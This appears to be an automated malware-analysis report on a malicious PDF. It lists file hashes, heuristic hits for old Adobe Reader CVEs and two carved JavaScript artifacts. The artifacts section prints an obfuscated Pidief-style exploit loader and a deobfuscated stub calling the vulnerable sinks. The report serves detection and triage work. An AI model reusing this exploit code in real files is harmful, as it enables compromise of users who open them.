PDF malware analysis — malicious · cb00aed60b8ebda0

MALICIOUS

PDF

7.4 KB Created: 2010-10-12 13:53:08 Authoring application: Fpibiwwesomehogoze (via 3819bCatzoxajaira) First seen: 2026-05-09

MD5: d82bf01c47032703a0ffaf78684a0962 SHA-1: 7621f5e4373087d9d3bfcf542bcee2cf8b8a0333 SHA-256: cb00aed60b8ebda0a7788222cd65fcd487604ff808e962bb7dc63eee439b494e

288 Risk Score

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 7

media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324

PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992

PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH

A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT

One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
JavaScript action low 1 related finding PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0011_000.js`	pdf-javascript-stream	PDF /JS object 11 at offset 0x136B	2418 bytes
SHA-256: `3ec80c91a9e437ea3498918fabeaea3a810badd46e7c4fcc483beeb49c072eff`
Preview script First 1,000 lines of the extracted script var hMZ = null; try { var zSD=300; var pWH=0; var pMN=new String("leng"+"th"); var fCH=''; var tKJI="Func"+"tion"; var oXSP=/[\!\\|\>%@_~78#]/g; function x(nOH){this.nYZ=this.r=nOH}; var xQD=new String("rep"+"lac"+"e"); var rAV=new String("charA"+"t"); var lSB=this; function tYN(pOT,pQN){return pOT+pQN}; var hSP="va%r_ ~g\|B8A#L8=7t\|h#i\|s_.>r8;~d~=%\'8g~e#t8P\|a7g!e7N!\'7;%t8K~J8=#d@+@\'%t\|h~W_o!r8d%\'%;\|t8W8X\|=>d8+\|\'#u8m!W~o_r!d\|s%\'\|;>l\|C!J@=8\'8p7a%g_e>N!u!m_\'@;>b~I7N8 \|=% !1%3%9! \|;%f7C\|H8=7\'%\'%;#p\|G@T#=~\'!j~o8i>n@\'!;_b7Q_T7=!\'_\'!;>p@W!H8=>0#;~r>C!Z~O_=%S\|t8r!i@n\|g%;#b_E%R!=8\'!s~u~b%s@t_r7\'!;#h7Q@Z\|=>\'!e_v@a7l\|\'\|;@p#M@N7=\|\'7l~e>n#g_t\|h8\'@;_z#O!F_=\|\'%\\_\\@x\|\'#;!x!U@H\|=>\'!t!o!S#t7r!i@n@g#\'7;>f7G8X\|=\|\'~p~a>r@s\|e8I>n7t>\'8;7s@Z@Q!B@=_\'_f_r#o!m_C!h>a%r8C~o@d>e@\'_;@t#E!J@=#\'7c7h7a#r@C7o7d7e#A%t%\'\|;#v7W%D7=\|4\|/_4%;7d@K#H_=!1#+~4#;\|l%=@2\|070\|+%5_5>;@l7S_B7=_\'%d7o7c\|\'~;~b\|M7F8=\|383!28;~r\|C~J\|=8[7]8;~f!O!D\|=>\'~\'%;_r!U>F%=~1>6~;%l7Q!P8=_2_;>p@E!B@=>4_;#x_I8L%=>g\|B>A%L8[@t%W!X7]\|(!g\|B!A>L![7l%C_J8]%)#;>f@o8r!(>d@I~X@=8p>W\|H>;>d_I8X!<# _x8I\|L>;\| 7d7I>X>+~+~)8{%v@a_r8 7t@O8Z%=#g!B%A#L#[#t_K!J#]8(_g%B_A!L@[~l_C>J\|]!,\|d!I8X~,\|t7r7u~e\|)8;>b#Q\|T!=>[%b7Q\|T>,8t>O%Z>]![!p%G!T\|]8(7f~C7H7)~;%;8}!f#o_r#(_d7I\|X!=~0~;7d7I@X8 @<% 8b@Q8T![%p>M>N#]7;! !d%I8X8+>=%l>Q!P>)%{_v!E%X%=>b%Q>T>[@b_E7R~]!(%d>I%X7,\|l8Q@P\|)%;8t>A#V7=\|p#a@r%s\|e7I\|n~t!(_v_E#X@,@r~U>F%)#;\|p_M>F7=%t%A>V\|^%b>I\|N~;%n#M>H%=8p%M7F!.7t!o#S>t%r!i>n_g8(\|r\|U>F#)7;@n_M~H#=_(~n~M_H\|[!p@M7N_]_=#=~v!W%D\|)8 \|?@ ~\'707\'> _+7 !n@M#H# \|:! \|n\|M~H7;~r#C8J!.%p%u8s_h!(\|n7M\|H@)>;_}8t8r>y# 7{!f@O!D_=_n>e7w% 7S!t~r!i>n~g@(>z_O!F! ~+7 %r@C8J![7p>G7T@]8(7z@O%F#)~)@;%a7p!p#[@h_Q%Z#]8(!\'7f!O%D%=#\"!\'>+>f\|O!D_+#\'8\"7;%\'>)\|;~g7B\|A!L@.7b7Q\|B~=!(#f@O!D\|[8b~E%R~]@(%f~O~D#[7p\|M_N\|]_-_b7M!F#)\|)>;@g@B#A_L@.#n7M!Z%=7(>f\|O_D7[@b7E_R@]7(_p\|W_H\|,>f\|O!D#[8p\|M8N!]7->b#M>F\|)\|)>;#d@Q@B~(@)~;\|}_ ~c8a~t#c8h>(~b@C\|N#)!{%i>f~(\|g%B7A>L%.#n7M7Z\|)!{#t_r#y_ ~{#a>p!p_[>h!Q%Z!]8(%g\|B@A_L!.>n_M%Z@)>;\|}> #c~a>t8c7h\|(>b@C~N!)!{#a8p%p7.#a!l_e~r!t~(!b>C>N!)!;\|}\|}! @e~l!s8e% 7{#a#p#p_.@a_l@e_r!t@(7\'@N%O! 8C8O~D>E#\'7)@;>}#}!"; var vWD=1; ; function rOX(jQB){zSX=fCH; for(dIX=jQB[pMN];dIX >= pWH;dIX--) zSX=tYN(zSX, jQB[rAV](dIX)); return zSX} hQZ=rOX("la"+"ve"); hSP=hSP[xQD](oXSP, fCH); ; x.prototype={ fQF : function(pEH){ if(pEH > zSD){ this.r[hQZ](hSP); } else { hMZ.fQF(pEH+vWD); } } }; var hMZ=new x(lSB); hMZ.fQF(pWH); } catch(fOD){ }
`legacy_pdfkit_stage_000.js`	deobfuscated-js	getPageWords-XOR Pidief stage normalized at offset 0x0	153 bytes
SHA-256: `18699f9d55ae1f1fd22bc427d0f09ac790fd8fafb1557dc66370fe40318c5f52`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script /* getPageWords-XOR Pidief stage normalized */ app.viewerVersion; Collab.getIcon("N."+unescape("%09")); media.newPlayer(null); util.printf("%45000f", 1);

Open this report in the interactive analyzer, or submit your own file for analysis.